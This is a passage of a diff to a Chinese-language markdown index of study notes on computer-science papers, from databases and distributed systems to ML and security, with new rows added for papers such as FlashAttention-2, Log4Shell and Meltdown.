`duchi-local-dp-2013` | [Local Privacy and Statistical Minimax Rates](/study/papers/duchi-local-dp-2013/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `duckdb-2019` | [DuckDB — 把 OLAP 数据库塞进你的 Python 进程](/study/papers/duckdb-2019/) | ✅ v3 | 数据库 | 存储与查询 | | `dwork-calibrating-noise-2006` | [校准噪声与敏感度 — Laplace 机制奠基](/study/papers/dwork-calibrating-noise-2006/) | ✅ v3 | 安全与隐私 | 安全与隐私 | +| `dwork-differential-privacy-2006` | [校准噪声与敏感度 — 差分隐私的 Laplace 机制](/study/papers/dwork-differential-privacy-2006/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `dwork-dp-icalp-2006` | [差分隐私 — ε 与邻接数据集不可区分](/study/papers/dwork-dp-icalp-2006/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `dwork-our-data-ourselves-2006` | [分布式噪声生成 — 去掉可信管理员也能保护隐私](/study/papers/dwork-our-data-ourselves-2006/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `dynamo` | [Dynamo — 让购物车永远能写入的分布式存储](/study/papers/dynamo/) | ✅ v3 | 分布式系统 | 分布式系统 | @@ -1581,6 +1692,7 @@ sidebar: | `ebpf` | [eBPF — 用户写小程序,内核证明安全后再跑](/study/papers/ebpf/) | ✅ v3 | 操作系统 | 操作系统 | | `edm-2022` | [EDM — 把扩散模型的训练配方一次拆清楚](/study/papers/edm-2022/) | ✅ v3 | 机器学习 | 模型与训练 | | `effect-handlers` | [代数效应(Algebraic Effects)](/study/papers/effect-handlers/) | ✅ v3 | 编程语言 | 编程语言 | +| `efficient-compile-2011` | [Efficiently Compiling Efficient Query Plans for Modern Hardware — 面向现代 CPU 的查询编译](/study/papers/efficient-compile-2011/) | ✅ v3 | 数据库 | 存储与查询 | | `effiskill` | [EffiSkill — 把代码效率优化经验抽成两层 skill 库](/study/papers/effiskill/) | ✅ v3 | Agent | 智能体与 LLM | | `egoschema-2023` | [EgoSchema — 三分钟第一视角长视频理解的诊断探针](/study/papers/egoschema-2023/) | ✅ v3 | 机器学习 | 视频理解 | | `electra-2020` | [ELECTRA — 把猜词题改成判真假题,训练效率 4 倍](/study/papers/electra-2020/) | ✅ v3 | 机器学习 | 模型与训练 | @@ -1597,13 +1709,16 @@ sidebar: | `evo-memory-2511` | [Evo-Memory — 给"会自己长记性"的 agent 出一份统一考卷](/study/papers/evo-memory-2511/) | ✅ v3 | Agent | 智能体与 LLM | | `exg-experience-graphs` | [EXG 经验图 — 把 agent 的成败拼成一张可复用的关系图](/study/papers/exg-experience-graphs/) | ✅ v3 | Agent | 智能体与 LLM | | `exokernel-1995` | [Exokernel — 把抽象推到用户态的极致设计](/study/papers/exokernel-1995/) | ✅ v3 | 操作系统 | 内核与虚拟化 | +| `expertflow-moe-offload` | [ExpertFlow — MoE 预测式专家缓存与 Token 调度(零基础学习笔记)](/study/papers/expertflow-moe-offload/) | ✅ v3 | 机器学习 | ML 系统 | | `f1-2013` | [F1 2013 — 把 Spanner 包成 SQL,扛起 AdWords 全部账单](/study/papers/f1-2013/) | ✅ v3 | 数据库 | 存储与查询 | | `f4-2014` | [f4 — Facebook 把 90 天前的旧图片搬到一个省 40% 存储的仓库](/study/papers/f4-2014/) | ✅ v3 | 分布式系统 | 共识与复制 | | `faiss-2017` | [FAISS 2017 — 用 GPU 在十亿向量里找最近邻](/study/papers/faiss-2017/) | ✅ v3 | 数据库 | 存储与查询 | | `fan-vercauteren-bfv-2012` | [Somewhat Practical Fully Homomorphic Encryption](/study/papers/fan-vercauteren-bfv-2012/) | ✅ v3 | 安全与隐私 | 安全与隐私 | +| `farm-2015` | [FaRM — 用 RDMA 把集群内存变成一块「共享白板」](/study/papers/farm-2015/) | ✅ v3 | 分布式系统 | 共识与复制 | | `farsite-2002` | [Farsite — 把一群不可信桌面 PC 拼成一台可信文件服务器](/study/papers/farsite-2002/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `fast-paxos-2006` | [Fast Paxos — 给 Paxos 加一条乐观快车道](/study/papers/fast-paxos-2006/) | ✅ v3 | 分布式系统 | 共识与复制 | | `fastertransformer-2021` | [FasterTransformer 2021 — NVIDIA 第一代开源 LLM 推理引擎](/study/papers/fastertransformer-2021/) | ✅ v3 | 图形学 | GPU 架构 | +| `fastlanes-compression` | [FastLanes 压缩布局 — 用标量代码每秒解码超过 1000 亿整数](/study/papers/fastlanes-compression/) | ✅ v3 | 数据库 | 存储与查询 | | `fat-tree-2008` | [Fat-Tree 2008 — 用一堆便宜交换机搭出现代数据中心](/study/papers/fat-tree-2008/) | ✅ v3 | 网络协议 | 网络协议 | | `feautrier-polyhedral` | [Feautrier 多面体调度 — 把循环并行化变成解几何方程](/study/papers/feautrier-polyhedral/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `fermi-architecture-2010` | [NVIDIA Fermi — 把 GPU 从游戏卡推上超算](/study/papers/fermi-architecture-2010/) | ✅ v3 | 图形学 | GPU 架构 | @@ -1612,10 +1727,13 @@ sidebar: | `fielding-rest-2000` | [Fielding 2000 — 用约束推导法把 Web 的成功讲成了一门方法](/study/papers/fielding-rest-2000/) | ✅ v3 | 网络协议 | 网络协议 | | `filip-2021` | [FILIP — 把 CLIP 的图文对齐细化到 token 级](/study/papers/filip-2021/) | ✅ v3 | 信息检索 | 检索与排序 | | `firecracker-2020` | [Firecracker 2020 — 给 serverless 量身定做的极简 microVM](/study/papers/firecracker-2020/) | ✅ v3 | 操作系统 | 内核与虚拟化 | +| `first-class-refinement-scala` | [First-Class Refinement Types for Scala — 把「带条件的类型」写进 Scala 3 本身](/study/papers/first-class-refinement-scala/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `flamingo-2022` | [Flamingo — 让冻结的大模型学会看图,几张样例就上手](/study/papers/flamingo-2022/) | ✅ v3 | 机器学习 | 模型与训练 | | `flan-2021` | [FLAN — 用自然语言指令教模型学会"听话"](/study/papers/flan-2021/) | ✅ v3 | 机器学习 | 模型与训练 | | `flash-attention` | [FlashAttention — 不改算法,只改数据怎么进 GPU](/study/papers/flash-attention/) | ✅ v3 | 图形学 | GPU 与系统 | | `flash-vstream-2024` | [Flash-VStream — STAR 双进程记忆的低延迟长流理解](/study/papers/flash-vstream-2024/) | ✅ v3 | 机器学习 | 视频理解 | +| `flashattention-2` | [FlashAttention-2 — 更快的 Attention 与更好的并行](/study/papers/flashattention-2/) | ✅ v3 | 机器学习 | ML 系统 | +| `flashattention-3-2024` | [FlashAttention-3 — Hopper 上的异步 Attention 与 FP8 低精度](/study/papers/flashattention-3-2024/) | ✅ v3 | 机器学习 | ML 系统 | | `flexible-paxos-2016` | [Flexible Paxos — 两阶段不一定都要多数派](/study/papers/flexible-paxos-2016/) | ✅ v3 | 分布式系统 | 共识与复制 | | `flexsc-2010` | [FlexSC — 把系统调用从同步陷入改成异步队列](/study/papers/flexsc-2010/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `flink-2015` | [Apache Flink — 流批一体的单引擎](/study/papers/flink-2015/) | ✅ v3 | 数据库 | 存储与查询 | @@ -1688,10 +1806,12 @@ sidebar: | `hdfs-2010` | [HDFS — 把 GFS 用 Java 重写一遍并撑到 25 PB](/study/papers/hdfs-2010/) | ✅ v3 | 数据库 | 存储与查询 | | `heartbleed-2014` | [Heartbleed — 一个忘了写边界检查的 bug 让全网 1/3 的 HTTPS 站点漏内存](/study/papers/heartbleed-2014/) | ✅ v3 | 网络协议 | 网络协议 | | `heckbert-1986-texture-survey` | [Heckbert 1986 — 把"贴图"这件事讲清楚的第一篇综述](/study/papers/heckbert-1986-texture-survey/) | ✅ v3 | 图形学 | 渲染与图形 | +| `hekaton` | [Hekaton — SQL Server 内存优化 OLTP 引擎](/study/papers/hekaton/) | ✅ v3 | 数据库 | 存储与查询 | | `helium-type-errors` | [Helium — 让类型错误说人话的教学版 Haskell](/study/papers/helium-type-errors/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `helland-2007` | [Life Beyond Distributed Transactions — 大规模系统下放弃跨机事务的宣言](/study/papers/helland-2007/) | ✅ v3 | 分布式系统 | 共识与复制 | | `herlihy-moss-tm` | [Herlihy-Moss 事务内存 — 把数据库事务搬进 CPU](/study/papers/herlihy-moss-tm/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `hewitt-actor-model` | [Hewitt Actor 模型 — 把计算拆成一群只会发消息的小邮筒](/study/papers/hewitt-actor-model/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | +| `hexagent-agentic-scheduling` | [HexAGenT — 面向 Agentic LLM 的工作流与异构感知调度](/study/papers/hexagent-agentic-scheduling/) | ✅ v3 | 机器学习 | 模型与训练 | | `hindley-milner` | [Hindley-Milner — 编译器自己猜变量类型](/study/papers/hindley-milner/) | 🗄 存量 | 编程语言 | 编程语言 | | `hits-1999` | [HITS — 给网页同时打两个分:权威页 + 索引页](/study/papers/hits-1999/) | ✅ v3 | 信息检索 | 检索与排序 | | `hlc-2014` | [HLC 2014 — 把逻辑时钟和物理时钟合一,让普通服务器也能拍一致快照](/study/papers/hlc-2014/) | ✅ v3 | 分布式系统 | 共识与复制 | @@ -1708,6 +1828,7 @@ sidebar: | `hu-2018-mls-mpm` | [MLS-MPM — 把 MPM 重写到"几百行能跑实时"的现代版本](/study/papers/hu-2018-mls-mpm/) | ✅ v3 | 图形学 | 渲染与图形 | | `huffman-1952` | [Huffman 编码](/study/papers/huffman-1952/) | ✅ v3 | 机器学习 | 信息论 / 算法 | | `hughes-fp-matters` | [Why FP Matters — 函数式真正赢在能拆能粘](/study/papers/hughes-fp-matters/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | +| `hullft-ttft` | [HullFT — 用凸包重建与梯度缓存做高效测试时微调](/study/papers/hullft-ttft/) | ✅ v3 | 机器学习 | 模型与训练 | | `hydra-1974` | [HYDRA — 用 capability 把整个内核重做成对象 + 票据](/study/papers/hydra-1974/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `hyperkernel-2017` | [Hyperkernel — 让 SMT 求解器一键验证操作系统内核](/study/papers/hyperkernel-2017/) | ✅ v3 | 形式化方法 | 形式化验证 | | `ice-rfc-5245` | [Interactive Connectivity Establishment (ICE): A Protocol for Network Address Translator (NAT) Traversal](/study/papers/ice-rfc-5245/) | ✅ v3 | 网络协议 | 网络协议 | @@ -1763,10 +1884,12 @@ sidebar: | `krishnamurthy-1999-http11` | [Krishnamurthy 1999 — HTTP/1.0 到 1.1 究竟改了什么](/study/papers/krishnamurthy-1999-http11/) | ✅ v3 | 网络协议 | 网络协议 | | `kubernetes-2016` | [Kubernetes — 为什么选声明式 API 加协调环](/study/papers/kubernetes-2016/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `kustomize` | [Kustomize — 不写模板也能给 K8s 配置分环境](/study/papers/kustomize/) | 🗄 存量 | 基础设施 | 基础设施 | +| `kv-fold` | [KV-Fold — 一步 KV 缓存递推实现长上下文推理](/study/papers/kv-fold/) | ✅ v3 | 机器学习 | 模型与训练 | | `kvm-2007` | [KVM 2007 — 把 Linux 内核本身变成 hypervisor](/study/papers/kvm-2007/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `l4-1995` | [L4 — Liedtke 用 12KB 内核反驳"微内核必然慢"](/study/papers/l4-1995/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `label-smoothing-2016` | [Label Smoothing — 别让模型对正确答案过度自信](/study/papers/label-smoothing-2016/) | ✅ v3 | 机器学习 | 模型与训练 | | `lafortune-1993-bdpt` | [Lafortune-Willems 1993 — 从相机和光源同时撒光线再"接龙"](/study/papers/lafortune-1993-bdpt/) | ✅ v3 | 图形学 | 渲染与图形 | +| `lakehouse-2021` | [Lakehouse — 用开放格式统一数据仓库与高级分析](/study/papers/lakehouse-2021/) | ✅ v3 | 数据库 | 存储与查询 | | `lalr-deremer` | [DeRemer LALR(1) — 把 LR 表压到能用大小](/study/papers/lalr-deremer/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `lambda-calculus` | [λ-演算 — 用三条规则表达所有可计算函数](/study/papers/lambda-calculus/) | 🗄 存量 | 编程语言 | 编程语言 / 计算理论 | | `lambdarank-2006` | [LambdaRank — 跳过定义损失函数,直接把梯度写出来](/study/papers/lambdarank-2006/) | ✅ v3 | 信息检索 | 检索与排序 | @@ -1774,6 +1897,7 @@ sidebar: | `lamport-tla-1994` | [TLA — 把状态机和时序逻辑捏成一个公式](/study/papers/lamport-tla-1994/) | ✅ v3 | 形式化方法 | 形式化验证 | | `lampson-hints` | [Lampson Hints — 把做系统的隐式品味写成 27 条经验法则](/study/papers/lampson-hints/) | ✅ v3 | 分布式系统 | 系统设计 | | `landin-secd` | [Landin SECD — 第一台机械求值 lambda 表达式的抽象机器](/study/papers/landin-secd/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | +| `language-server-protocol-spec` | [Language Server Protocol — 让编辑器共享同一套「语言大脑」的 USB 协议](/study/papers/language-server-protocol-spec/) | ✅ v3 | CLI | 编辑器与 IDE | | `layernorm-2016` | [Layer Normalization — 把归一化方向从 batch 转到 feature,让 RNN/Transformer 也能稳定训](/study/papers/layernorm-2016/) | ✅ v3 | 机器学习 | 模型与训练 | | `lean-prover` | [Lean 4 — 用 Lean 重写的 Lean,让数学家和程序员共用一种语言](/study/papers/lean-prover/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `lean-tactics` | [Lean Tactics — 让证明助手把"写证明"当成写程序](/study/papers/lean-tactics/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | @@ -1781,10 +1905,12 @@ sidebar: | `leis-2015-optimizers` | [Leis 2015 — 用真实数据打脸所有数据库的查询优化器](/study/papers/leis-2015-optimizers/) | ✅ v3 | 数据库 | 存储与查询 | | `lerner-seminal` | [Lerner 组合数据流 — 让小优化互相喂招](/study/papers/lerner-seminal/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `levoy-hanrahan-1996-light-field` | [Light Field Rendering — 把场景拍成 4D 数组,新视角靠查表](/study/papers/levoy-hanrahan-1996-light-field/) | ✅ v3 | 图形学 | 渲染与图形 | +| `lfm2-5-8b-a1b-moe` | [LFM2.5-8B-A1B — 38T 预训练的边缘 MoE 个人助手](/study/papers/lfm2-5-8b-a1b-moe/) | ✅ v3 | 机器学习 | 模型与训练 | | `lfs-1991` | [LFS 1991 — 把整个磁盘当日志写](/study/papers/lfs-1991/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `li-2018-redner` | [redner — 让光线追踪能反向传播过几何边缘](/study/papers/li-2018-redner/) | ✅ v3 | 图形学 | 渲染与图形 | | `li-t-closeness-2007` | [t-Closeness — 用"分布距离"堵住匿名化的最后漏洞](/study/papers/li-t-closeness-2007/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `lieberman-realtime-gc` | [Lieberman-Hewitt 1983 — 把对象寿命统计偏斜兑换成有界停顿](/study/papers/lieberman-realtime-gc/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | +| `liger-kernel-llm-training` | [Liger Kernel — 面向 LLM 训练的高效 Triton Kernel 套件](/study/papers/liger-kernel-llm-training/) | ✅ v3 | 机器学习 | ML 系统 | | `lindholm-2008-tesla` | [Lindholm 2008 Tesla — SM、warp、SIMT 这套词汇的官方出生证明](/study/papers/lindholm-2008-tesla/) | ✅ v3 | 图形学 | 渲染与图形 | | `linear-scan-reg-alloc` | [Linear Scan 寄存器分配 — 把图染色换成单趟扫描,给 JIT 用](/study/papers/linear-scan-reg-alloc/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `linear-types` | [线性类型(Linear Types)](/study/papers/linear-types/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | @@ -1800,12 +1926,15 @@ sidebar: | `llava-onevision-2024` | [LLaVA-OneVision — 单图、多图、视频一个模型全搞定](/study/papers/llava-onevision-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `llava-video-2024` | [LLaVA-Video — LLaVA-NeXT 视频主线,合成数据 + SlowFast 采帧](/study/papers/llava-video-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `llm-int8-2022` | [LLM.int8() — 大模型激活值里藏着几个超大异常通道](/study/papers/llm-int8-2022/) | ✅ v3 | 图形学 | GPU 架构 | +| `llm-serving-needs-math` | [LLM Serving Needs Mathematical Optimization, Not Just Heuristics — 零基础学习笔记](/study/papers/llm-serving-needs-math/) | ✅ v3 | 机器学习 | 模型与训练 | | `llm-wiki-retrieval-reasoning` | [LLM-Wiki — 把外部知识编译成 agent 自己的"维基"](/study/papers/llm-wiki-retrieval-reasoning/) | ✅ v3 | Agent | 智能体与 LLM | +| `llmsurgeon-data-mixture` | [LLMSurgeon — 从生成文本反推大模型预训练数据配比](/study/papers/llmsurgeon-data-mixture/) | ✅ v3 | 机器学习 | 模型与训练 | | `llmvs-2025` | [LLMVS — 用 LLM 语义裁判给视频帧打分做摘要](/study/papers/llmvs-2025/) | ✅ v3 | 机器学习 | 视频理解 | | `llvm` | [LLVM — 模块化编译器框架](/study/papers/llvm/) | 🗄 存量 | 编译器 | 编译器 | | `lmdb-2011` | [LMDB 2011 — 把数据库直接 mmap 进内存的嵌入式 KV 存储](/study/papers/lmdb-2011/) | ✅ v3 | 数据库 | 存储与查询 | | `local-type-inference` | [Local Type Inference — 编译器只看相邻节点也能推出类型](/study/papers/local-type-inference/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `locus-1980` | [LOCUS 1980 — 让一群机器看起来像同一台机器](/study/papers/locus-1980/) | ✅ v3 | 操作系统 | 内核与虚拟化 | +| `log4shell-cve-2021-44228` | [Log4Shell (CVE-2021-44228) — 一条日志字符串如何远程控制服务器](/study/papers/log4shell-cve-2021-44228/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `logjam-2015` | [Logjam 2015 — 全世界共用一把锁,国家级窃听者一次撬完](/study/papers/logjam-2015/) | ✅ v3 | 网络协议 | 网络协议 | | `logoot-2010` | [Logoot — 给每个字符发一张"永不过期的座位号"](/study/papers/logoot-2010/) | ✅ v3 | 分布式系统 | 共识与复制 | | `long-video-retrieval-2023` | [R-VLM — 长视频不靠均匀采帧,靠可学习检索选片段](/study/papers/long-video-retrieval-2023/) | ✅ v3 | 机器学习 | 视频理解 | @@ -1813,6 +1942,7 @@ sidebar: | `longva-2024` | [LongVA — 把语言模型的长上下文能力「搬」到视频上](/study/papers/longva-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `longvideobench-2024` | [LongVideoBench — 一小时交织字幕视频的长上下文理解考卷](/study/papers/longvideobench-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `longvila-2024` | [LongVILA — 把 VILA 从 8 帧扩到 2048 帧的长视频全栈方案](/study/papers/longvila-2024/) | ✅ v3 | 机器学习 | 视频理解 | +| `loong-doc-mt` | [Loong — 类人长文档翻译 Agent 与自适应上下文选择](/study/papers/loong-doc-mt/) | ✅ v3 | 机器学习 | 模型与训练 | | `loop-1987-subdivision` | [Loop 1987 — 三角形网格的递归光滑细分](/study/papers/loop-1987-subdivision/) | ✅ v3 | 图形学 | 渲染与图形 | | `lottery-1994` | [彩票调度 — 用抽奖代替优先级的资源分配](/study/papers/lottery-1994/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `lottery-ticket-2019` | [彩票假设 — 大网里藏着一张能独立训出来的小网](/study/papers/lottery-ticket-2019/) | ✅ v3 | 机器学习 | 模型与训练 | @@ -1822,6 +1952,7 @@ sidebar: | `lucky13-2013` | [Lucky 13 — 用毫秒级时间差把 TLS 加密看穿](/study/papers/lucky13-2013/) | ✅ v3 | 网络协议 | 网络协议 | | `lvbench-2024` | [LVBench — 平均 68 分钟、六维能力的长视频极限考](/study/papers/lvbench-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `mach-1986` | [Mach — 把内核拆成消息互通的小服务](/study/papers/mach-1986/) | ✅ v3 | 操作系统 | 内核与虚拟化 | +| `mach-rashid-1986` | [Mach 1986 — 给 UNIX 换一块能跨机器生长的内核地基](/study/papers/mach-rashid-1986/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `mach-vm-1987` | [Mach VM — 把虚拟内存抽象成"对象",与硬件解耦](/study/papers/mach-vm-1987/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `machanavajjhala-l-diversity-2007` | [l-多样性 — k-匿名之后的隐私保护](/study/papers/machanavajjhala-l-diversity-2007/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `macklin-2014-position-based-fluids` | [Position Based Fluids — 把水也塞进 PBD 同一套框架](/study/papers/macklin-2014-position-based-fluids/) | ✅ v3 | 图形学 | 渲染与图形 | @@ -1842,14 +1973,19 @@ sidebar: | `mcfarling-bp-1993` | [McFarling 1993 — 用 XOR 把全局历史和 PC 拧在一起,再让两个预测器打擂台](/study/papers/mcfarling-bp-1993/) | ✅ v3 | 图形学 | GPU 架构 | | `mcmahan-fedavg-2017` | [FedAvg — 联邦学习奠基算法](/study/papers/mcmahan-fedavg-2017/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `mcmillan-smv-1993` | [McMillan SMV 1993 — 把状态空间从 10^6 推到 10^20 的符号模型检测](/study/papers/mcmillan-smv-1993/) | ✅ v3 | 形式化方法 | 形式化验证 | +| `mcp-is-dead-debate` | [MCP Is Dead? — 2026 年协议存废之争零基础笔记](/study/papers/mcp-is-dead-debate/) | ✅ v3 | 后端 API | Web 后端 | | `mcp-spec` | [MCP — 让一个 LLM 客户端能插任何外部能力的 USB 协议](/study/papers/mcp-spec/) | ✅ v3 | 机器学习 | AI 工程 | | `mcs-locks-1991` | [MCS 锁 — 让每个线程自旋在自己的缓存行上](/study/papers/mcs-locks-1991/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `meagher-1982-octree` | [Meagher 1982 八叉树 — 把立方体一分为八,递归地装下一整个 3D 世界](/study/papers/meagher-1982-octree/) | ✅ v3 | 图形学 | 渲染与图形 | | `medusa-2024` | [Medusa — 让大模型自己同时猜好几个 token](/study/papers/medusa-2024/) | ✅ v3 | 图形学 | GPU 架构 | | `megastore-2011` | [Megastore — 把数据切成"小数据库"换跨地域同步复制](/study/papers/megastore-2011/) | ✅ v3 | 分布式系统 | 共识与复制 | +| `megatron-core-moe-2026` | [Megatron Core MoE 大规模训练 — 零基础学习笔记](/study/papers/megatron-core-moe-2026/) | ✅ v3 | 机器学习 | ML 系统 | | `megatron-lm` | [Megatron-LM — NVIDIA 大规模训练框架](/study/papers/megatron-lm/) | ✅ v3 | 分布式系统 | 模型与训练 | +| `meltdown-attack-2018` | [Meltdown — 从用户空间偷读内核内存](/study/papers/meltdown-attack-2018/) | ✅ v3 | 安全与隐私 | 安全与隐私 | +| `mem-ft-lora` | [How LoRA Remembers? — 参数记忆定律与 MemFT 零基础学习笔记](/study/papers/mem-ft-lora/) | ✅ v3 | 机器学习 | 模型与训练 | | `memcached-fb-2013` | [Scaling Memcache at Facebook — 万台缓存怎么不被踩塌](/study/papers/memcached-fb-2013/) | ✅ v3 | 分布式系统 | 共识与复制 | | `memcoder-co-evolution` | [MemCoder — code agent 跟着你 git commit 一起成长](/study/papers/memcoder-co-evolution/) | ✅ v3 | Agent | 智能体与 LLM | +| `memory-tool-use-agents` | [When Does Memory Help Multi-Trajectory Inference for Tool-Use LLM Agents?](/study/papers/memory-tool-use-agents/) | ✅ v3 | 机器学习 | 模型与训练 | | `mencius-2008` | [Mencius — 让多台服务器轮流当 Paxos 的 leader](/study/papers/mencius-2008/) | ✅ v3 | 分布式系统 | 共识与复制 | | `mermaid` | [Mermaid — 用文本写图,让代码评审能 diff 流程图](/study/papers/mermaid/) | ✅ v3 | 基础设施 | 工具与基础设施 | | `mesa-optimization-2019` | [Mesa-Optimization 2019 — 训出来的模型自己也是个优化器](/study/papers/mesa-optimization-2019/) | ✅ v3 | 机器学习 | 模型与训练 | @@ -1867,6 +2003,7 @@ sidebar: | `minicpm-v-2024` | [MiniCPM-V — 手机能跑的 GPT-4V 级多模态模型](/study/papers/minicpm-v-2024/) | ✅ v3 | 机器学习 | 模型与训练 | | `minisat-2003` | [MiniSat 2003 — 600 行 C++ 把 CDCL 写成教科书](/study/papers/minisat-2003/) | ✅ v3 | 形式化方法 | 形式化验证 | | `mips-1981` | [MIPS 1981 — 让编译器自己安排流水线,CPU 就不用管](/study/papers/mips-1981/) | ✅ v3 | 图形学 | GPU 架构 | +| `mira-rubric` | [MIRA — 中期训练中的来源感知 Rubric 锚定数据筛选](/study/papers/mira-rubric/) | ✅ v3 | 机器学习 | 模型与训练 | | `mirage-2013` | [MirageOS Unikernels — 应用即内核,把操作系统编译掉](/study/papers/mirage-2013/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `mironov-renyi-dp-2017` | [Rényi 差分隐私 — 隐私会计统一框架](/study/papers/mironov-renyi-dp-2017/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `misevolution-2509` | [Misevolution — 自进化 agent 也会"越改越坏",连顶配模型也躲不过](/study/papers/misevolution-2509/) | ✅ v3 | Agent | 智能体与 LLM | @@ -1890,6 +2027,7 @@ sidebar: | `monaghan-1992-sph` | [SPH — 把流体拆成一群带核的粒子](/study/papers/monaghan-1992-sph/) | ✅ v3 | 图形学 | 渲染与图形 | | `monetdb-x100-2005` | [MonetDB/X100 — 让数据库一次处理一向量行而不是一行](/study/papers/monetdb-x100-2005/) | ✅ v3 | 数据库 | 存储与查询 | | `monitors-1974` | [Hoare Monitors 1974 — 把锁藏进对象里,让并发代码读起来像普通函数](/study/papers/monitors-1974/) | ✅ v3 | 操作系统 | 内核与虚拟化 | +| `morsel-driven-2014` | [Morsel-Driven Parallelism — 面向 NUMA 的查询并行执行框架](/study/papers/morsel-driven-2014/) | ✅ v3 | 数据库 | 存储与查询 | | `moviechat-2024` | [MovieChat — 从稠密帧到稀疏记忆,小时级电影也能聊](/study/papers/moviechat-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `mplug-owl-2023` | [mPLUG-Owl — 模块化拼装多模态大模型](/study/papers/mplug-owl-2023/) | ✅ v3 | 机器学习 | 模型与训练 | | `mptcp-2012` | [MPTCP 2012 — 把一根 TCP 管道变成多条并行水管](/study/papers/mptcp-2012/) | ✅ v3 | 网络协议 | 网络协议 | @@ -1906,12 +2044,14 @@ sidebar: | `nbeats-2020` | [N-BEATS — 纯前馈网络在时序预测上打败统计派](/study/papers/nbeats-2020/) | ✅ v3 | 机器学习 | 模型与训练 | | `nelson-oppen-1979` | [Nelson-Oppen 1979 — 让多个判定程序坐下来交换"我刚发现 a=b"](/study/papers/nelson-oppen-1979/) | ✅ v3 | 形式化方法 | 形式化验证 | | `nerf-2020` | [NeRF — 用一个 MLP 把整个场景"背"下来](/study/papers/nerf-2020/) | ✅ v3 | 图形学 | 渲染与图形 | +| `nestedkv` | [NestedKV — 嵌套内存路由实现长上下文 KV Cache 压缩](/study/papers/nestedkv/) | ✅ v3 | 机器学习 | 模型与训练 | | `netflix-bellkor-2009` | [BellKor Netflix Prize 2009 — 集成学习赢下 100 万美金的工程实录](/study/papers/netflix-bellkor-2009/) | ✅ v3 | 信息检索 | 检索与排序 | | `netkat-2014` | [NetKAT 2014 — 把网络转发写成可以做数学等式变换的代数式](/study/papers/netkat-2014/) | ✅ v3 | 网络协议 | 网络协议 | | `neumann-2015-large-joins` | [Adaptive Optimization of Very Large Join Queries — 100 张表也敢精确求解](/study/papers/neumann-2015-large-joins/) | ✅ v3 | 数据库 | 存储与查询 | | `neumf-2017` | [NeuMF — 用神经网络替掉推荐系统的内积](/study/papers/neumf-2017/) | ✅ v3 | 信息检索 | 检索与排序 | | `newcombe-2011-kinectfusion` | [KinectFusion — 用消费级深度相机实时重建三维世界](/study/papers/newcombe-2011-kinectfusion/) | ✅ v3 | 图形学 | 渲染与图形 | | `newsome-taintcheck-2005` | [Dynamic Taint Analysis for Automatic Detection, Analysis, and Signature Generation of Exploits on Commodity Software](/study/papers/newsome-taintcheck-2005/) | ✅ v3 | 安全与隐私 | 安全与隐私 | +| `nexus-prefill-decode-intra-gpu` | [Nexus — 单 GPU 内主动式 Prefill/Decode 分离](/study/papers/nexus-prefill-decode-intra-gpu/) | ✅ v3 | 机器学习 | ML 系统 | | `nfs-1985` | [NFS 1985 — 让远程磁盘看起来像本地磁盘](/study/papers/nfs-1985/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `ngabonziza-trustzone-2016` | [TrustZone — ARM 给 CPU 装上"双重人格"隔离安全世界](/study/papers/ngabonziza-trustzone-2016/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `nickolls-dally-2010-cuda-era` | [Nickolls-Dally 2010 — GPU 怎么从画三角形变成跑 AI](/study/papers/nickolls-dally-2010-cuda-era/) | ✅ v3 | 图形学 | 渲染与图形 | @@ -1919,6 +2059,7 @@ sidebar: | `nimier-david-2019-mitsuba2` | [Mitsuba 2 — 一份渲染代码同时编出 CPU / GPU / 可微版](/study/papers/nimier-david-2019-mitsuba2/) | ✅ v3 | 图形学 | 渲染与图形 | | `nix` | [Nix — 把每个软件包当成纯函数的输出](/study/papers/nix/) | ✅ v3 | CLI | 包管理 / 系统 | | `no-silver-bullet` | [No Silver Bullet — 软件难度的二分手术刀](/study/papers/no-silver-bullet/) | ✅ v3 | 其他 | 软件工程 | +| `noise-protocol-framework` | [Noise Protocol Framework — 用「握手配方」拼出端到端加密通道](/study/papers/noise-protocol-framework/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `ntk-2018` | [NTK — 把无限宽的神经网络变成一个可解的核方法](/study/papers/ntk-2018/) | ✅ v3 | 机器学习 | 模型与训练 | | `ntp-mills-1991` | [NTP 1991 — 